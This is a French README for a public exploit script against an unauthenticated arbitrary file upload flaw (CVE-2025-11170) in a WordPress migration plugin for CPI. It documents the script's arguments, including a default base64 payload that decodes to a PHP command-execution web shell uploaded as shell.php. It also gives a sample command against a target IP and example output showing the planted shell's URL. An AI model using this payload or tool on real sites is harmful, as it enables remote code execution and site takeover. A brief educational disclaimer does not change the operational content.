
WP移行専用プラグイン pour CPI <= 1.0.2 - Téléchargement de fichier arbitraire non authentifié
WP移行専用プラグイン for CPI <= 1.0.2 - Téléchargement arbitraire de fichier non authentifié
Le plugin WP移行専用プラグイン for CPI pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison de l'absence de validation du type de fichier dans la fonction Cpiwm_Import_Controller::import dans toutes les versions jusqu'à la version 1.0.2 incluse.
Cela permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur du site affecté, ce qui peut permettre l'exécution de code à distance.
CVE-2025-11170.py| Argument | Description |
|---|---|
-u, --url | URL cible de base (p. ex., http://target.com/wordpress/). Le script ajoute automatiquement wp-admin/admin-ajax.php. |
-f, --filename | Nom du shell ou fichier à télécharger. Par défaut : shell.php |
-d, --data | Contenu du fichier en base64 (ou texte brut). Par défaut : PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | Valeur du champ index. Par défaut : 0 |
-H, --headers | En-têtes HTTP supplémentaires (format : X-Key:Value;K2:Value2) |
-t, --timeout | Délai d'attente pour la requête HTTP (secondes). Par défaut : 10 |
--retries | Nombre de tentatives de relance. Par défaut : 3 |
--backoff | Facteur d'attente entre les tentatives (secondes). Par défaut : 0.7 |
-v, --verbose | Augmenter la verbosité pour le débogage (répétable) |
Nxploited_parse_args
Analyse et valide les arguments d'entrée. Assure la bonne structure du point de terminaison, les en-têtes et l'encodage des données.
Nxploited_logging
Configure une journalisation avancée et la verbosité pour une sortie d'exécution détaillée ou minimale.
Nxploited_retry_session
Initialise une session persistante avec une logique de relance et d'attente pour des communications résilientes.
Nxploited_build_payload
Construit les paramètres de la requête POST pour l'exploitation.
Nxploited_send
Effectue la requête POST réelle vers le point de terminaison vulnérable et gère les réponses/erreurs.
Nxploited_output_result
Traite et formate la réponse, affichant le chemin du shell en cas de succès, ou des informations de débogage sinon.
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
Exemple de sortie :
Téléchargement du shell...
Traitement de la réponse...
[+] Téléchargement réussi !
Chemin du shell :
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
Mon GitHub : https://github.com/Nxploited
Ce script est fourni uniquement à des fins éducatives.
L'utilisation de cet exploit sur des cibles sans autorisation appropriée peut être illégale.
L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques.
GitHub : Nxploited
Telegram : KNxploited
Par : Nxploited ( Khaled Alenazi )